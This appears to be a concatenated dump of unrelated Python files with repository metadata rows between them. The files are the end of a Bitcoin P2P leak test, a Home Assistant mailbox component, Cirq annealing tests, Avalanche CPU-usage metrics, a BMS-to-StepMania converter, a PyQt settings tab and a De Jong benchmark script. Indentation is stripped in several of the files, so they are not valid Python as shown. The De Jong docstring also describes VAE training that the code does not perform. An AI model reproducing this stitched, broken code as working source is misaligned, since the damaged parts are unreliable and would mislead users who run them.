no_version_idle_peer = self.nodes[0].add_p2p_connection(LazyPeer(), send_version=False, wait_for_verack=False)
# Peer that sends a version but not a verack.
no_verack_idle_peer = self.nodes[0].add_p2p_connection(NoVerackIdlePeer(), wait_for_verack=False)
# Pre-wtxidRelay peer that sends a version but not a verack and does not support feature negotiation
# messages which start at nVersion == 70016
pre_wtxidrelay_peer = self.nodes[0].add_p2p_connection(NoVerackIdlePeer(), send_version=False, wait_for_verack=False)
pre_wtxidrelay_peer.send_message(self.create_old_version(70015))
# Wait until the peer gets the verack in response to the version. Though, don't wait for the node to receive the
# verack, since the peer never sent one
no_verack_idle_peer.wait_for_verack()
pre_wtxidrelay_peer.wait_for_verack()
no_version_idle_peer.wait_until(lambda: no_version_idle_peer.ever_connected)
no_verack_idle_peer.wait_until(lambda: no_verack_idle_peer.version_received)
pre_wtxidrelay_peer.wait_until(lambda: pre_wtxidrelay_peer.version_received)
# Mine a block and make sure that it's not sent to the connected peers
self.nodes[0].generate(nblocks=1)
# Give the node enough time to possibly leak out a message
time.sleep(PEER_TIMEOUT + 2)
# Make sure only expected messages came in
assert not no_version_idle_peer.unexpected_msg
assert not no_version_idle_peer.got_wtxidrelay
assert not no_version_idle_peer.got_sendaddrv2
assert not no_verack_idle_peer.unexpected_msg
assert no_verack_idle_peer.got_wtxidrelay
assert no_verack_idle_peer.got_sendaddrv2
assert not pre_wtxidrelay_peer.unexpected_msg
assert not pre_wtxidrelay_peer.got_wtxidrelay
assert not pre_wtxidrelay_peer.got_sendaddrv2
# Expect peers to be disconnected due to timeout
assert not no_version_idle_peer.is_connected
assert not no_verack_idle_peer.is_connected
assert not pre_wtxidrelay_peer.is_connected
self.log.info('Check that the version message does not leak the local address of the node')
p2p_version_store = self.nodes[0].add_p2p_connection(P2PVersionStore())
ver = p2p_version_store.version_received
# Check that received time is within one hour of now
assert_greater_than_or_equal(ver.nTime, time.time() - 3600)
assert_greater_than_or_equal(time.time() + 3600, ver.nTime)
assert_equal(ver.addrFrom.port, 0)
assert_equal(ver.addrFrom.ip, '0.0.0.0')
assert_equal(ver.nStartingHeight, 201)
assert_equal(ver.relay, 1)
self.log.info('Check that old peers are disconnected')
p2p_old_peer = self.nodes[0].add_p2p_connection(P2PInterface(), send_version=False, wait_for_verack=False)
with self.nodes[0].assert_debug_log(['peer=4 using obsolete version 31799; disconnecting']):
p2p_old_peer.send_message(self.create_old_version(31799))
p2p_old_peer.wait_for_disconnect()
if __name__ == '__main__':
P2PLeakTest().main()
| 41.312849 | 125 | 0.727654 |
5d05596fb23af36b757e3261dc8f7d2bbe514f3a | 8,147 | py | Python | homeassistant/components/mailbox/__init__.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 5 | 2018-10-23T14:15:05.000Z | 2021-11-26T06:38:44.000Z | homeassistant/components/mailbox/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | homeassistant/components/mailbox/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 6 | 2019-07-06T00:43:13.000Z | 2021-01-16T13:27:06.000Z | """Support for Voice mailboxes."""
import asyncio
from contextlib import suppress
from datetime import timedelta
import logging
from aiohttp import web
from aiohttp.web_exceptions import HTTPNotFound
import async_timeout
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import HTTP_INTERNAL_SERVER_ERROR
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.setup import async_prepare_setup_platform
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DOMAIN = "mailbox"
EVENT = "mailbox_updated"
CONTENT_TYPE_MPEG = "audio/mpeg"
CONTENT_TYPE_NONE = "none"
SCAN_INTERVAL = timedelta(seconds=30)
async def async_setup(hass, config):
"""Track states and offer events for mailboxes."""
mailboxes = []
hass.components.frontend.async_register_built_in_panel(
"mailbox", "mailbox", "mdi:mailbox"
)
hass.http.register_view(MailboxPlatformsView(mailboxes))
hass.http.register_view(MailboxMessageView(mailboxes))
hass.http.register_view(MailboxMediaView(mailboxes))
hass.http.register_view(MailboxDeleteView(mailboxes))
async def async_setup_platform(p_type, p_config=None, discovery_info=None):
"""Set up a mailbox platform."""
if p_config is None:
p_config = {}
if discovery_info is None:
discovery_info = {}
platform = await async_prepare_setup_platform(hass, config, DOMAIN, p_type)
if platform is None:
_LOGGER.error("Unknown mailbox platform specified")
return
_LOGGER.info("Setting up %s.%s", DOMAIN, p_type)
mailbox = None
try:
if hasattr(platform, "async_get_handler"):
mailbox = await platform.async_get_handler(
hass, p_config, discovery_info
)
elif hasattr(platform, "get_handler"):
mailbox = await hass.async_add_executor_job(
platform.get_handler, hass, p_config, discovery_info
)
else:
raise HomeAssistantError("Invalid mailbox platform.")
if mailbox is None:
_LOGGER.error("Failed to initialize mailbox platform %s", p_type)
return
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error setting up platform %s", p_type)
return
mailboxes.append(mailbox)
mailbox_entity = MailboxEntity(mailbox)
component = EntityComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL
)
await component.async_add_entities([mailbox_entity])
setup_tasks = [
asyncio.create_task(async_setup_platform(p_type, p_config))
for p_type, p_config in config_per_platform(config, DOMAIN)
]
if setup_tasks:
await asyncio.wait(setup_tasks)
async def async_platform_discovered(platform, info):
"""Handle for discovered platform."""
await async_setup_platform(platform, discovery_info=info)
discovery.async_listen_platform(hass, DOMAIN, async_platform_discovered)
return True
class MailboxEntity(Entity):
"""Entity for each mailbox platform to provide a badge display."""
def __init__(self, mailbox):
"""Initialize mailbox entity."""
self.mailbox = mailbox
self.message_count = 0
async def async_added_to_hass(self):
"""Complete entity initialization."""
@callback
def _mailbox_updated(event):
self.async_schedule_update_ha_state(True)
self.hass.bus.async_listen(EVENT, _mailbox_updated)
self.async_schedule_update_ha_state(True)
@property
def state(self):
"""Return the state of the binary sensor."""
return str(self.message_count)
@property
def name(self):
"""Return the name of the entity."""
return self.mailbox.name
async def async_update(self):
"""Retrieve messages from platform."""
messages = await self.mailbox.async_get_messages()
self.message_count = len(messages)
class Mailbox:
"""Represent a mailbox device."""
def __init__(self, hass, name):
"""Initialize mailbox object."""
self.hass = hass
self.name = name
@callback
def async_update(self):
"""Send event notification of updated mailbox."""
self.hass.bus.async_fire(EVENT)
@property
def media_type(self):
"""Return the supported media type."""
raise NotImplementedError()
@property
def can_delete(self):
"""Return if messages can be deleted."""
return False
@property
def has_media(self):
"""Return if messages have attached media files."""
return False
async def async_get_media(self, msgid):
"""Return the media blob for the msgid."""
raise NotImplementedError()
async def async_get_messages(self):
"""Return a list of the current messages."""
raise NotImplementedError()
async def async_delete(self, msgid):
"""Delete the specified messages."""
raise NotImplementedError()
class StreamError(Exception):
"""Media streaming exception."""
class MailboxView(HomeAssistantView):
"""Base mailbox view."""
def __init__(self, mailboxes):
"""Initialize a basic mailbox view."""
self.mailboxes = mailboxes
def get_mailbox(self, platform):
"""Retrieve the specified mailbox."""
for mailbox in self.mailboxes:
if mailbox.name == platform:
return mailbox
raise HTTPNotFound
class MailboxPlatformsView(MailboxView):
"""View to return the list of mailbox platforms."""
url = "/api/mailbox/platforms"
name = "api:mailbox:platforms"
async def get(self, request: web.Request) -> web.Response:
"""Retrieve list of platforms."""
platforms = []
for mailbox in self.mailboxes:
platforms.append(
{
"name": mailbox.name,
"has_media": mailbox.has_media,
"can_delete": mailbox.can_delete,
}
)
return self.json(platforms)
class MailboxMessageView(MailboxView):
"""View to return the list of messages."""
url = "/api/mailbox/messages/{platform}"
name = "api:mailbox:messages"
async def get(self, request, platform):
"""Retrieve messages."""
mailbox = self.get_mailbox(platform)
messages = await mailbox.async_get_messages()
return self.json(messages)
class MailboxDeleteView(MailboxView):
"""View to delete selected messages."""
url = "/api/mailbox/delete/{platform}/{msgid}"
name = "api:mailbox:delete"
async def delete(self, request, platform, msgid):
"""Delete items."""
mailbox = self.get_mailbox(platform)
await mailbox.async_delete(msgid)
class MailboxMediaView(MailboxView):
"""View to return a media file."""
url = r"/api/mailbox/media/{platform}/{msgid}"
name = "api:asteriskmbox:media"
async def get(self, request, platform, msgid):
"""Retrieve media."""
mailbox = self.get_mailbox(platform)
with suppress(asyncio.CancelledError, asyncio.TimeoutError):
with async_timeout.timeout(10):
try:
stream = await mailbox.async_get_media(msgid)
except StreamError as err:
error_msg = "Error getting media: %s" % (err)
_LOGGER.error(error_msg)
return web.Response(status=HTTP_INTERNAL_SERVER_ERROR)
if stream:
return web.Response(body=stream, content_type=mailbox.media_type)
return web.Response(status=HTTP_INTERNAL_SERVER_ERROR)
| 30.859848 | 83 | 0.651283 |
49c54517d0fdd8a8be6009182c2f8e6f61e1271e | 2,935 | py | Python | cirq-google/cirq_google/line/placement/optimization_test.py | Saibaba-Alapati/Cirq | 782efcd04c3bbf73a0d630306a3d1cfd9966521d | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/line/placement/optimization_test.py | resduo/Cirq | 680f897345eb1c71c9242515edda8f04b8594319 | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/line/placement/optimization_test.py | resduo/Cirq | 680f897345eb1c71c9242515edda8f04b8594319 | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from unittest import mock
import pytest
from cirq_google.line.placement import optimization
def test_accept_accepts():
# Cost constant, should be accepted.
assert optimization._accept(0.0, 0.0, 1.0)[0]
# Cost improved, should be accepted.
assert optimization._accept(0.0, -0.1, 1.0)[0]
# Cost decreased, should be accepted if low sample.
assert optimization._accept(0.0, 1.0, 1.0)[0]
# Cost decreased, should be accepted if below the threshold (exp(-1.0))
assert optimization._accept(1.0 / math.e - 1e-9, 1.0, 1.0)[0]
def test_accept_rejects():
# Cost decreased, should be rejected if high sample.
assert not optimization._accept(1.0 - 1e-9, 1.0, 1.0)[0]
# Cost decreased, should be rejected if above the threshold (exp(-1.0))
assert not optimization._accept(1.0 / math.e + 1e-9, 1.0, 1.0)[0]
def test_anneal_minimize_improves_when_better():
assert (
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
0.5,
1,
)
== 'better'
)
def test_anneal_minimize_keeps_when_worse_and_discarded():
assert (
optimization.anneal_minimize(
'initial',
lambda s: 0.0 if s == 'initial' else 1.0,
lambda s: 'better',
lambda: 0.9,
1.0,
0.5,
0.5,
1,
)
== 'initial'
)
def test_anneal_minimize_raises_when_wrong_cooling_factor():
with pytest.raises(ValueError):
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
2.0,
1,
)
def test_anneal_minimize_calls_trace_func():
trace_func = mock.Mock()
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
0.5,
1,
trace_func=trace_func,
)
trace_func.assert_has_calls(
[mock.call('initial', 1.0, 1.0, 1.0, True), mock.call('better', 1.0, 0.0, 1.0, True)]
)
| 27.175926 | 93 | 0.59523 |
bc7369567f19c2580ddb182671193f0f800fe55b | 9,638 | py | Python | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | 1 | 2021-12-26T21:08:19.000Z | 2021-12-26T21:08:19.000Z | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | null | null | null | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import os
import warnings
from typing import Optional, List
from psutil import Process
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metrics import Mean
class CPUUsage(Metric[float]):
    """
    The standalone CPU usage metric.
    Instances of this metric compute the average CPU usage as a float value.
    The metric starts tracking the CPU usage when the `update` method is called
    for the first time. That is, the tracking does not start at the time the
    constructor is invoked.
    Calling the `update` method more than twice will update the metric to the
    average usage between the first and the last call to `update`.
    The result, obtained using the `result` method, is the usage computed
    as stated above.
    The reset method will bring the metric to its initial state. By default
    this metric in its initial state will return an usage value of 0.
    """

    def __init__(self):
        """
        Creates an instance of the standalone CPU usage metric.
        By default this metric in its initial state will return a CPU usage
        value of 0. The metric can be updated by using the `update` method
        while the average CPU usage can be retrieved using the `result` method.
        """
        self._mean_usage = Mean()
        """
        The mean utility that will be used to store the average usage.
        """
        self._process_handle: Optional[Process] = None
        """
        The process handle, lazily initialized.
        """
        self._first_update = True
        """
        An internal flag to keep track of the first call to the `update` method.
        """

    def update(self) -> None:
        """
        Update the running CPU usage.
        For more info on how to set the starting moment see the class
        description.
        :return: None.
        """
        if self._first_update:
            # Lazily create the handle for the current process on first use.
            self._process_handle = Process(os.getpid())
        # NOTE(review): `_last_sys_cpu_times` is a psutil-private attribute
        # used here to measure the elapsed interval between successive
        # cpu_percent() calls; it may break with psutil upgrades — confirm.
        # Call order matters: read the previous timestamp, then cpu_percent()
        # (which refreshes it), then read the new timestamp.
        last_time = getattr(self._process_handle, "_last_sys_cpu_times", None)
        utilization = self._process_handle.cpu_percent()
        current_time = getattr(
            self._process_handle, "_last_sys_cpu_times", None
        )
        if self._first_update:
            # The first cpu_percent() call returns a meaningless 0.0 and only
            # primes the internal timers, so it is not folded into the mean.
            self._first_update = False
        else:
            if current_time is None or last_time is None:
                warnings.warn(
                    "CPUUsage can't detect the elapsed time. It is "
                    "recommended to update avalanche to the latest "
                    "version."
                )
                # Fallback, shouldn't happen
                current_time = 1.0
                last_time = 0.0
            # Weight each sample by the time elapsed since the last update.
            self._mean_usage.update(utilization, current_time - last_time)

    def result(self) -> float:
        """
        Retrieves the average CPU usage.
        Calling this method will not change the internal state of the metric.
        :return: The average CPU usage, as a float value.
        """
        return self._mean_usage.result()

    def reset(self) -> None:
        """
        Resets the metric.
        :return: None.
        """
        self._mean_usage.reset()
        self._process_handle = None
        self._first_update = True
class CPUPluginMetric(GenericPluginMetric[float]):
    """Base plugin metric wrapping a standalone :class:`CPUUsage` metric.

    Subclasses choose when the metric is reset and emitted via the
    ``reset_at``/``emit_at``/``mode`` constructor arguments.
    """

    def __init__(self, reset_at, emit_at, mode):
        self._cpu = CPUUsage()
        super().__init__(
            self._cpu, reset_at=reset_at, emit_at=emit_at, mode=mode
        )

    def update(self, strategy):
        # Delegate to the wrapped metric; `strategy` is not needed here.
        self._cpu.update()
class MinibatchCPUUsage(CPUPluginMetric):
    """Per-iteration CPU usage, tracked at training time only.

    The usage is reset and emitted once per training iteration. For a more
    coarse-grained log consider :class:`EpochCPUUsage`.
    """

    def __init__(self):
        """Create the per-minibatch CPU usage plugin metric."""
        super().__init__(
            reset_at="iteration", emit_at="iteration", mode="train"
        )

    def before_training_iteration(self, strategy):
        super().before_training_iteration(strategy)
        # First update primes the measurement window for this iteration.
        self.update(strategy)  # start monitoring thread

    def __str__(self):
        return "CPUUsage_MB"
class EpochCPUUsage(CPUPluginMetric):
    """Per-epoch CPU usage, tracked at training time only.

    The average usage is emitted once after each training epoch.
    """

    def __init__(self):
        """Create the per-epoch CPU usage plugin metric."""
        super().__init__(
            reset_at="epoch", emit_at="epoch", mode="train"
        )

    def before_training_epoch(self, strategy):
        super().before_training_epoch(strategy)
        # First update primes the measurement window for this epoch.
        self.update(strategy)  # start monitoring thread

    def __str__(self):
        return "CPUUsage_Epoch"
class RunningEpochCPUUsage(CPUPluginMetric):
    """Running per-epoch CPU usage, tracked at training time only.

    After every iteration this metric emits the average CPU usage measured
    over the epoch so far.
    """

    def __init__(self):
        """Create the running epoch CPU usage plugin metric."""
        self._mean = Mean()
        super().__init__(
            reset_at="epoch", emit_at="iteration", mode="train"
        )

    def result(self, strategy) -> float:
        # The emitted value is the running mean, not the raw CPUUsage result.
        return self._mean.result()

    def before_training_epoch(self, strategy):
        super().before_training_epoch(strategy)
        self._mean.reset()

    def before_training_iteration(self, strategy):
        super().before_training_iteration(strategy)
        # Prime the measurement window for this iteration.
        self.update(strategy)  # start monitoring thread

    def after_training_iteration(self, strategy):
        super().after_training_iteration(strategy)
        # Close the window, fold its usage into the running mean, and reset
        # the wrapped metric so the next iteration starts clean.
        self.update(strategy)
        self._mean.update(self._cpu.result())
        self._cpu.reset()
        return self._package_result(strategy)

    def __str__(self):
        return "RunningCPUUsage_Epoch"
class ExperienceCPUUsage(CPUPluginMetric):
    """Average CPU usage per evaluation experience (eval time only)."""

    def __init__(self):
        """Create the per-experience CPU usage plugin metric."""
        super().__init__(
            reset_at="experience", emit_at="experience", mode="eval"
        )

    def before_eval_exp(self, strategy):
        super().before_eval_exp(strategy)
        # Prime the measurement window for this experience.
        self.update(strategy)  # start monitoring thread

    def __str__(self):
        return "CPUUsage_Exp"
class StreamCPUUsage(CPUPluginMetric):
    """Average CPU usage over the whole evaluation stream (eval time only)."""

    def __init__(self):
        """Create the stream CPU usage plugin metric."""
        super().__init__(
            reset_at="stream", emit_at="stream", mode="eval"
        )

    def before_eval(self, strategy):
        super().before_eval(strategy)
        # Prime the measurement window for the whole eval stream.
        self.update(strategy)  # start monitoring thread

    def __str__(self):
        return "CPUUsage_Stream"
def cpu_usage_metrics(
    *,
    minibatch=False,
    epoch=False,
    epoch_running=False,
    experience=False,
    stream=False
) -> List[PluginMetric]:
    """Build the requested set of CPU usage plugin metrics.

    :param minibatch: if True, log the CPU usage of every training minibatch.
    :param epoch: if True, log the CPU usage of every training epoch.
    :param epoch_running: if True, log the running epoch CPU usage after
        each iteration.
    :param experience: if True, log the CPU usage of each eval experience.
    :param stream: if True, log the CPU usage over the whole eval stream.
    :return: the list of instantiated plugin metrics.
    """
    # Table-driven construction; order matches the parameter order above.
    selections = (
        (minibatch, MinibatchCPUUsage),
        (epoch, EpochCPUUsage),
        (epoch_running, RunningEpochCPUUsage),
        (experience, ExperienceCPUUsage),
        (stream, StreamCPUUsage),
    )
    return [factory() for enabled, factory in selections if enabled]
# Public API of this module; keep in sync with the definitions above.
__all__ = [
    "CPUUsage",
    "MinibatchCPUUsage",
    "EpochCPUUsage",
    "RunningEpochCPUUsage",
    "ExperienceCPUUsage",
    "StreamCPUUsage",
    "cpu_usage_metrics",
]
| 29.655385 | 80 | 0.60469 |
930614da5510462a3ca06b6addc7183f604a8b9e | 1,220 | py | Python | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamber_base_py | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 10 | 2020-06-28T11:16:36.000Z | 2021-08-09T21:41:43.000Z | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamberPy | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 35 | 2020-06-18T13:05:50.000Z | 2022-02-18T10:13:35.000Z | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamber_base_py | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 2 | 2021-05-26T17:05:06.000Z | 2021-06-12T18:42:13.000Z | from unidecode import unidecode
from reamber.algorithms.convert.ConvertBase import ConvertBase
from reamber.bms.BMSMap import BMSMap
from reamber.sm.SMMap import SMMap
from reamber.sm.SMMapMeta import SMMapChartTypes
from reamber.sm.SMMapSet import SMMapSet
from reamber.sm.lists.SMBpmList import SMBpmList
from reamber.sm.lists.notes.SMHitList import SMHitList
from reamber.sm.lists.notes.SMHoldList import SMHoldList
class BMSToSM(ConvertBase):
    @classmethod
    def convert(cls, bms: BMSMap) -> SMMapSet:
        """Convert a BMS map into a StepMania map set.

        Despite the original wording, the returned set contains a single
        SM map built from `bms`.
        """
        sm = SMMap()
        # Copy note/hold/bpm lists field-by-field via the ConvertBase caster.
        sm.hits = cls.cast(bms.hits, SMHitList, dict(offset='offset', column='column'))
        sm.holds = cls.cast(bms.holds, SMHoldList, dict(offset='offset', column='column', length='length'))
        sm.bpms = cls.cast(bms.bpms, SMBpmList, dict(offset='offset', bpm='bpm'))
        # NOTE(review): assumes BMS metadata fields are Shift-JIS encoded
        # bytes; unidecode then transliterates them to ASCII — confirm.
        sm.description = unidecode(bms.version.decode('sjis'))
        # Key count = highest used column index + 1.
        sm.chart_type = SMMapChartTypes.get_type(bms.stack().column.max() + 1)
        sms = SMMapSet()
        sms.maps = [sm]
        sms.title = unidecode(bms.title.decode('sjis'))
        sms.artist = unidecode(bms.artist.decode('sjis'))
        sms.offset = 0.0
        return sms
| 36.969697 | 107 | 0.696721 |
3ca4c849549cb72bb779265199e30c175a78b3ef | 3,017 | py | Python | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | null | null | null | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | 20 | 2018-10-04T07:36:22.000Z | 2020-05-18T13:10:42.000Z | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | null | null | null |
from PyQt4 import QtCore, QtGui
import time
import sys
from functools import partial
class LpdFemGuiMainEvrTab(object):
    '''
    Helper class to manage EVR tab in main window.

    Populates the EVR multicast widgets from cached application parameters
    and writes edited values back to the cache, refreshing widget enable
    state after every change.
    '''
    def __init__(self, app_main, mainWindow):
        '''
        Constructor.

        :param app_main: application object providing get/setCachedParam.
        :param mainWindow: main window owning the Qt `ui` and msgPrint.
        '''
        self.app_main = app_main
        self.mainWindow = mainWindow
        self.ui = mainWindow.ui
        self.msgPrint = self.mainWindow.msgPrint
        # Initialise default fields based on app_main object cached parameters
        self.ui.evrMcastGroupEdit.setText(self.app_main.getCachedParam('evrMcastGroup'))
        self.ui.evrMcastPortEdit.setText(str(self.app_main.getCachedParam('evrMcastPort')))
        self.ui.evrMcastInterfaceEdit.setText(self.app_main.getCachedParam('evrMcastInterface'))
        if self.app_main.getCachedParam('evrRecordEnable') == True:
            self.ui.evrRecordEnableSel.setCheckState(QtCore.Qt.Checked)
        else:
            self.ui.evrRecordEnableSel.setCheckState(QtCore.Qt.Unchecked)
        # Connect signals and slots (old-style PyQt4 string-based connect)
        QtCore.QObject.connect(self.ui.evrMcastGroupEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastGroupUpdate)
        QtCore.QObject.connect(self.ui.evrMcastPortEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastPortUpdate)
        QtCore.QObject.connect(self.ui.evrMcastInterfaceEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastInterfaceUpdate)
        QtCore.QObject.connect(self.ui.evrRecordEnableSel, QtCore.SIGNAL("toggled(bool)"), self.evrRecordSelect)

    def updateEnabledWidgets(self):
        # Intentionally a no-op: this tab has no state-dependent widgets.
        pass

    def evrMcastGroupUpdate(self):
        '''Persist an edited multicast group, reverting the field on error.'''
        evrMcastGroup = self.ui.evrMcastGroupEdit.text()
        try:
            evrMcastGroupStr = str(evrMcastGroup)
            self.app_main.setCachedParam('evrMcastGroup', evrMcastGroupStr)
            self.mainWindow.updateEnabledWidgets()
        except ValueError:
            # Restore the last known-good cached value on conversion failure.
            self.ui.evrMcastGroupEdit.setText(self.app_main.getCachedParam('evrMcastGroup'))

    def evrMcastPortUpdate(self):
        '''Persist an edited multicast port (int), reverting the field on error.'''
        evrMcastPort = self.ui.evrMcastPortEdit.text()
        try:
            evrMcastPortVal = int(evrMcastPort)
            self.app_main.setCachedParam('evrMcastPort', evrMcastPortVal)
            self.mainWindow.updateEnabledWidgets()
        except ValueError:
            self.ui.evrMcastPortEdit.setText(str(self.app_main.getCachedParam('evrMcastPort')))

    def evrMcastInterfaceUpdate(self):
        '''Persist an edited multicast interface, reverting the field on error.'''
        evrMcastInterface = self.ui.evrMcastInterfaceEdit.text()
        try:
            evrMcastInterfaceStr = str(evrMcastInterface)
            self.app_main.setCachedParam('evrMcastInterface', evrMcastInterfaceStr)
            self.mainWindow.updateEnabledWidgets()
        except ValueError:
            self.ui.evrMcastInterfaceEdit.setText(self.app_main.getCachedParam('evrMcastInterface'))

    def evrRecordSelect(self, state):
        '''Persist the record-enable checkbox state (bool from toggled signal).'''
        self.app_main.setCachedParam('evrRecordEnable', state)
        self.mainWindow.updateEnabledWidgets()
| 41.328767 | 127 | 0.695061 |
cd11b3d705fa17cb1fc16ee97eb5ee27977ffb57 | 3,171 | py | Python | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | 2 | 2022-02-15T08:39:26.000Z | 2022-02-17T11:51:06.000Z | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | null | null | null | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# Benchmark function
def dejong5(X1, X2):
    """Evaluate De Jong's fifth function (Shekel's foxholes) element-wise.

    :param X1: 1-D array-like of first coordinates (typical domain ~[-50, 50]).
    :param X2: 1-D array-like of second coordinates, same length as X1.
    :return: numpy array of shape (len(X1),) with the function value per point.
    """
    # The 5x5 grid of foxhole centres is identical for every evaluation
    # point, so build it once instead of once per point (loop-invariant
    # hoist; the original rebuilt A inside the loop).
    a = np.array([-32, -16, 0, 16, 32])
    A = np.zeros((2, 25))
    A[0, :] = np.tile(a, (1, 5))
    A[1, :] = np.sort(np.tile(a, (1, 5)))

    n_vals = len(X1)
    Y = np.full((n_vals), np.nan)
    for i in range(n_vals):
        x1, x2 = X1[i], X2[i]
        total = 0
        for ii in range(25):
            a1i = A[0, ii]
            a2i = A[1, ii]
            term1 = ii + 1
            term2 = (x1 - a1i) ** 6
            term3 = (x2 - a2i) ** 6
            total += 1 / (term1 + term2 + term3)
        # (The original also bound the useless alias `y` here; removed.)
        Y[i] = 1 / (0.002 + total)
    return Y
# As a constraint only
def dejong_constraint(X1, X2, threshold=445):
    """ 1) Expected Range of [-50 to 50]
        2) Optima (0,0) in invalid region
    """
    # Shrink the coordinates into the foxhole region.
    zoom = .39
    u = X1 * zoom
    v = X2 * zoom
    # Rotate the shrunken points by -33 degrees about the origin.
    theta = np.radians(-33)
    c, s = np.cos(theta), np.sin(theta)
    rotation = np.array(((c, -s), (s, c)))
    u, v = rotation @ np.array([u, v])
    # Shift so that the global optimum lands in the invalid region.
    u += 9
    v += -3
    # Points below the threshold are considered valid.
    return dejong5(u, v) < threshold
def create_dataset(random=False, res=100, n_samples=1000):
    """Collect points satisfying the De Jong constraint.

    :param random: sample uniformly at random instead of on a regular grid.
    :param res: grid resolution per axis (grid mode only).
    :param n_samples: number of random draws (random mode only).
    :return: array of shape (n_valid, 2) with the valid (x, y) points.
    """
    abs_range = 50
    if random:
        # Uniform samples in [-abs_range, abs_range] per coordinate.
        xs = (2 * (np.random.rand(n_samples) - 0.5)) * abs_range
        ys = (2 * (np.random.rand(n_samples) - 0.5)) * abs_range
        keep = dejong_constraint(xs, ys)
        pts = np.c_[xs, ys]
    else:
        # Regular res x res grid over the same square.
        axis_x = np.linspace(-abs_range, abs_range, res)
        axis_y = np.linspace(-abs_range, abs_range, res)
        grid_x, grid_y = np.meshgrid(axis_x, axis_y)  # grid of points
        keep = dejong_constraint(grid_x.flatten(), grid_y.flatten())
        pts = np.c_[grid_x.flatten(), grid_y.flatten()]
    return pts[keep, :]
def main():
    """Build a dataset of valid De Jong points, plot it, and train a VAE.

    Side effects: writes 'dejong_dataset.csv', 'dejong_valid_solutions.png'
    and 'dejong_vae.pt' to the current working directory.
    """
    n_samples = 5000
    # Keep sampling random batches until at least n_samples valid points exist.
    valid_pts = create_dataset(random=True)
    training_set = [valid_pts]
    while len(np.vstack(training_set)) < n_samples:
        valid_pts = create_dataset(random=True)
        training_set += [valid_pts]
    training_set = np.vstack(training_set)
    training_set = training_set[:n_samples]
    np.savetxt('dejong_dataset.csv', training_set)
    # Visualize the valid region; red dot marks the (invalid) optimum (0,0).
    fig, ax = plt.subplots(figsize=(4, 4))
    ax.scatter(training_set[:,0], training_set[:,1], s=1)
    ax.scatter(0,0,c='r',s=80)
    ax.set(xlim=[-51,51], ylim=[-51,51])
    fig.savefig('dejong_valid_solutions.png')
